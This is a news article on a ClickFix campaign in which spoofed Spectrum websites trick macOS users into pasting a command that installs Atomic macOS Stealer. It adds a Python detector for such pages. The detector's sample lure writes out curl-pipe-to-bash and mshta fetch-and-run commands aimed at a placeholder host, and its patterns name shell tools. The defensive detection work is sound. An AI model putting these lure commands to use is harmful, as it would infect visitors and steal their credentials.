- CloudSEK researchers find a spoofed version of the Spectrum website
- The site encourages visitors to run AMOS via the ClickFix method
- The researchers attributed the attack to a Russian-speaking group
Russian-speaking threat actors were seen using the popular ClickFix method to steal passwords and drop malware on macOS targets.
CloudSEK security researchers have reported several websites spoofing Spectrum, a telecommunications provider based in the United States. Victims visiting these websites would first be asked to verify that they are human; however, the "verification" was designed to fail, after which victims would be invited to use an "alternative verification".
We do not know why the attackers added the extra step; one assumption is that it wears victims down and lowers their guard.
In all cases, the "alternative verification" method copies a command to the victim's clipboard, and the victim is then told to paste and run it on their device.
The command deploys Atomic macOS Stealer (AMOS), an infamous macOS infostealer that harvests passwords, cryptocurrency wallet data and system information from macOS users.
CloudSEK did not attribute the campaign to a particular threat actor, but determined that the operators are of Russian origin.
"By inspecting the source code of the delivery page, we came across some comments in Russian, indicating that the malware is probably being distributed by Russian-speaking cybercriminals," the company said.
The campaign does not appear to target a specific group of people or businesses, but since it spoofs Spectrum, it is safe to say the victims are current or prospective customers of the company.
Experts noted that the campaign was put together rather sloppily: "Poorly implemented logic on the delivery sites, such as inconsistent instructions across platforms, indicates hastily built infrastructure."
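As an added illustration (not code from CloudSEK or the article), the heuristic below scores a captured web page for the ClickFix pattern described here: a clipboard write combined with shell fragments and paste-and-run lure text, with an extra point for the mixed per-platform instructions the researchers noted. The two page samples are constructed, and example.invalid is a placeholder domain.

```python
import re
from dataclasses import dataclass, field

# Signals that a "verification" page is really a ClickFix lure: JavaScript that
# writes to the clipboard, shell or script fragments sitting in page text, and
# copy telling the visitor to open a terminal or run dialog and paste.
CLIPBOARD_WRITE = re.compile(
    r"navigator\.clipboard\.writeText\s*\(|execCommand\s*\(\s*['\"]copy['\"]", re.I)
MAC_PAYLOAD = re.compile(
    r"\b(curl|wget)\b[^\n]{0,160}\|\s*(ba|z)?sh\b|\bosascript\b|\bbase64\s+(-d|--decode)\b", re.I)
WIN_PAYLOAD = re.compile(r"\bpowershell\b|\bmshta\b|\bcmd(\.exe)?\s+/c\b", re.I)
PASTE_LURE = re.compile(
    r"paste\s+(it\s+)?(and|then)\s+(press|hit)\s+(enter|return)"
    r"|\b(cmd|command|win)\s*\+\s*(space|r)\b"
    r"|alternative\s+verification", re.I)

@dataclass
class Verdict:
    suspicious: bool
    score: int
    reasons: list[str] = field(default_factory=list)

def assess_page(html: str) -> Verdict:
    """Score one captured page; 3 or more points flags it as a ClickFix candidate."""
    score, reasons = 0, []
    if CLIPBOARD_WRITE.search(html):
        score += 2
        reasons.append("script writes to the clipboard")
    mac, win = bool(MAC_PAYLOAD.search(html)), bool(WIN_PAYLOAD.search(html))
    if mac or win:
        score += 2
        reasons.append("shell/script fragment in page content")
    if mac and win:
        # One page carrying instructions for several platforms matches the
        # inconsistent per-platform instructions seen on the spoofed sites.
        score += 1
        reasons.append("instructions for more than one platform")
    if PASTE_LURE.search(html):
        score += 1
        reasons.append("paste-and-run lure text")
    return Verdict(score >= 3, score, reasons)

# Constructed samples (not real captures): a benign share button and a lure page.
BENIGN_PAGE = '<button onclick="navigator.clipboard.writeText(location.href)">Copy link</button>'
LURE_PAGE = """<div class="verify">Verification failed. Use alternative verification:
press Cmd + Space, type Terminal, paste and press Enter.</div>
<script>navigator.clipboard.writeText("curl -fsSL https://example.invalid/verify.sh | bash");</script>
<noscript>Windows users: press Win + R and paste: mshta https://example.invalid/v</noscript>"""

if __name__ == "__main__":
    for name, page in (("benign", BENIGN_PAGE), ("lure", LURE_PAGE)):
        v = assess_page(page)
        print(f"{name}: suspicious={v.suspicious} score={v.score} reasons={v.reasons}")
```

A copy-link button alone scores 2 and stays clean; the lure page scores 6 because it combines the clipboard write, a curl-pipe-to-shell fragment, a Windows mshta variant and the "alternative verification" wording.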
ClickFix has become very popular lately, with various security outfits reporting a range of variants of the technique in the wild.
Via The Hacker News